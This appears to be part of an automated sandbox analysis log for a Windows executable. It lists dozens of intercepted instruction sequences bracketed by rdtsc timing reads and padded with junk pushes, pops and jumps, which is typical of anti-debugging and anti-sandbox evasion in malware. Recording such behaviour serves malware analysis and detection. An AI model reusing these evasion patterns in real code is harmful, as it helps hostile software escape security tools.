Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B4D59 second address: 5B4D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5760CD second address: 5760D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5760D1 second address: 5760DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576160 second address: 57618D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FD001095A56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD001095A67h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57618D second address: 576193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576193 second address: 5761EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD001095A5Ch 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnp 00007FD001095A5Ah 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e pop eax 0x0000001f jmp 00007FD001095A61h 0x00000024 call 00007FD001095A59h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007FD001095A56h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5761EA second address: 5761EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5761EE second address: 5761F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5761F4 second address: 57623E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C5Ch 0x00000008 jg 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 jmp 00007FD000CC0C5Ah 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007FD000CC0C5Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FD000CC0C65h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57623E second address: 576243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576300 second address: 576305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5763B2 second address: 5763C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5763C3 second address: 5763C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5769D9 second address: 5769DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5769DD second address: 5769E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5769E1 second address: 5769E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5769E7 second address: 576A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FD000CC0C62h 0x0000000f nop 0x00000010 jmp 00007FD000CC0C5Eh 0x00000015 push 0000001Eh 0x00000017 mov edx, dword ptr [ebp+122D3AA3h] 0x0000001d jne 00007FD000CC0C5Eh 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 mov bx, 1165h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d jmp 00007FD000CC0C69h 0x00000032 jo 00007FD000CC0C58h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576A51 second address: 576A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576EA0 second address: 576EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C69h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576EBE second address: 576EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 576EC4 second address: 55D862 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D2C83h] 0x00000011 call dword ptr [ebp+122D2B18h] 0x00000017 push edi 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B51A4 second address: 5B51AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B51AC second address: 5B51B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B52D8 second address: 5B52E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B52E1 second address: 5B52E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B52E5 second address: 5B52E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B52E9 second address: 5B52EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B52EF second address: 5B52F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5475 second address: 5B5479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5479 second address: 5B5487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD001095A56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5487 second address: 5B549C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 jc 00007FD000CC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B549C second address: 5B54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A5Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B54AF second address: 5B54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5740 second address: 5B5773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 jmp 00007FD001095A63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5773 second address: 5B5788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007FD000CC0C56h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5788 second address: 5B5793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5793 second address: 5B579D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5929 second address: 5B592F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B592F second address: 5B5935 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5935 second address: 5B595C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 js 00007FD001095A81h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD001095A63h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B595C second address: 5B5962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B5AC6 second address: 5B5ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BA39C second address: 5BA3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BA3A0 second address: 5BA3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BA3A9 second address: 5BA3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BA3B2 second address: 5BA3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BB1C4 second address: 5BB1CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5BB1CA second address: 5BB1D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C0564 second address: 5C056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C056A second address: 5C0579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C0579 second address: 5C0584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD000CC0C56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52CF4D second address: 52CF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007FD001095A65h 0x00000012 popad 0x00000013 pushad 0x00000014 ja 00007FD001095A5Ah 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C7313 second address: 5C731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C77A8 second address: 5C77AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C7902 second address: 5C7919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD000CC0C61h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA620 second address: 5CA655 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FD001095A56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD001095A61h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FD001095A56h 0x0000001a jmp 00007FD001095A5Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA655 second address: 5CA659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CA7B0 second address: 5CA7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D07A0 second address: 5D07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D07AA second address: 5D07B4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D07B4 second address: 5D07D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD000CC0C64h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD000CC0C5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FD000CC0C56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF2E2 second address: 5CF2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF42A second address: 5CF437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FD000CC0C56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF437 second address: 5CF44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF44F second address: 5CF453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF982 second address: 5CF998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A5Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007FD001095A56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF998 second address: 5CF9BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FD000CC0C65h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF9BA second address: 5CF9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D04E0 second address: 5D04EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 jnp 00007FD000CC0C5Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D1EF3 second address: 5D1EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D35D1 second address: 5D35D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D35D7 second address: 5D35DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB79A second address: 5DB79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB79E second address: 5DB7A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB7A4 second address: 5DB7BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD000CC0C5Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DB7BD second address: 5DB7C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9CCE second address: 5D9CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9CD2 second address: 5D9CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A64h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9CF0 second address: 5D9CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D9CF6 second address: 5D9CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA2DD second address: 5DA2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD000CC0C56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA2F2 second address: 5DA2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DA8DA second address: 5DA8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FD000CC0C56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DABA9 second address: 5DABAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0E7A second address: 5E0E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E0E7E second address: 5E0E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E250A second address: 5E2514 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E2514 second address: 5E251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3A71 second address: 5E3A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C68h 0x00000009 jnc 00007FD000CC0C56h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E3A94 second address: 5E3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD001095A5Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7004 second address: 5E7008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7185 second address: 5E718A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E7693 second address: 5E76A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E76A5 second address: 5E76C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD001095A65h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF1D2 second address: 5EF1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF1D6 second address: 5EF1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF1E0 second address: 5EF1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD000CC0C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF5EF second address: 5EF5F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF5F5 second address: 5EF601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD000CC0C56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF601 second address: 5EF605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
